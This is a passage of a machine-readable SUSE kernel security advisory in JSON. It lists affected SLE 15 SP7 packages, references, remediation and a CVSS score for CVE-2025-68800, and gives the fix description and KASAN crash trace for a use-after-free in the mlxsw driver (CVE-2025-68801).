"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68800",
"url": "https://www.suse.com/security/cve/CVE-2025-68800"
},
{
"category": "external",
"summary": "SUSE Bug 1256646 for CVE-2025-68800",
"url": "https://bugzilla.suse.com/1256646"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68800"
},
{
"cve": "CVE-2025-68801",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68801"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_router: Fix neighbour use-after-free\n\nWe sometimes observe use-after-free when dereferencing a neighbour [1].\nThe problem seems to be that the driver stores a pointer to the\nneighbour, but without holding a reference on it. A reference is only\ntaken when the neighbour is used by a nexthop.\n\nFix by simplifying the reference counting scheme. Always take a\nreference when storing a neighbour pointer in a neighbour entry. Avoid\ntaking a referencing when the neighbour is used by a nexthop as the\nneighbour entry associated with the nexthop already holds a reference.\n\nTested by running the test that uncovered the problem over 300 times.\nWithout this patch the problem was reproduced after a handful of\niterations.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_neigh_entry_update+0x2d4/0x310\nRead of size 8 at addr ffff88817f8e3420 by task ip/3929\n\nCPU: 3 UID: 0 PID: 3929 Comm: ip Not tainted 6.18.0-rc4-virtme-g36b21a067510 #3 PREEMPT(full)\nHardware name: Nvidia SN5600/VMOD0013, BIOS 5.13 05/31/2023\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xa0\n print_address_description.constprop.0+0x6e/0x300\n print_report+0xfc/0x1fb\n kasan_report+0xe4/0x110\n mlxsw_sp_neigh_entry_update+0x2d4/0x310\n mlxsw_sp_router_rif_gone_sync+0x35f/0x510\n mlxsw_sp_rif_destroy+0x1ea/0x730\n mlxsw_sp_inetaddr_port_vlan_event+0xa1/0x1b0\n __mlxsw_sp_inetaddr_lag_event+0xcc/0x130\n __mlxsw_sp_inetaddr_event+0xf5/0x3c0\n mlxsw_sp_router_netdevice_event+0x1015/0x1580\n notifier_call_chain+0xcc/0x150\n call_netdevice_notifiers_info+0x7e/0x100\n __netdev_upper_dev_unlink+0x10b/0x210\n netdev_upper_dev_unlink+0x79/0xa0\n vrf_del_slave+0x18/0x50\n do_set_master+0x146/0x7d0\n do_setlink.isra.0+0x9a0/0x2880\n rtnl_newlink+0x637/0xb20\n rtnetlink_rcv_msg+0x6fe/0xb90\n netlink_rcv_skb+0x123/0x380\n netlink_unicast+0x4a3/0x770\n netlink_sendmsg+0x75b/0xc90\n __sock_sendmsg+0xbe/0x160\n ____sys_sendmsg+0x5b2/0x7d0\n ___sys_sendmsg+0xfd/0x180\n __sys_sendmsg+0x124/0x1c0\n do_syscall_64+0xbb/0xfd0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n[...]\n\nAllocated by task 109:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7b/0x90\n __kmalloc_noprof+0x2c1/0x790\n neigh_alloc+0x6af/0x8f0\n ___neigh_create+0x63/0xe90\n mlxsw_sp_nexthop_neigh_init+0x430/0x7e0\n mlxsw_sp_nexthop_type_init+0x212/0x960\n mlxsw_sp_nexthop6_group_info_init.constprop.0+0x81f/0x1280\n mlxsw_sp_nexthop6_group_get+0x392/0x6a0\n mlxsw_sp_fib6_entry_create+0x46a/0xfd0\n mlxsw_sp_router_fib6_replace+0x1ed/0x5f0\n mlxsw_sp_router_fib6_event_work+0x10a/0x2a0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nFreed by task 154:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x60\n __kasan_slab_free+0x43/0x70\n kmem_cache_free_bulk.part.0+0x1eb/0x5e0\n kvfree_rcu_bulk+0x1f2/0x260\n kfree_rcu_work+0x130/0x1b0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nLast potentially related work creation:\n kasan_save_stack+0x30/0x50\n kasan_record_aux_stack+0x8c/0xa0\n kvfree_call_rcu+0x93/0x5b0\n mlxsw_sp_router_neigh_event_work+0x67d/0x860\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
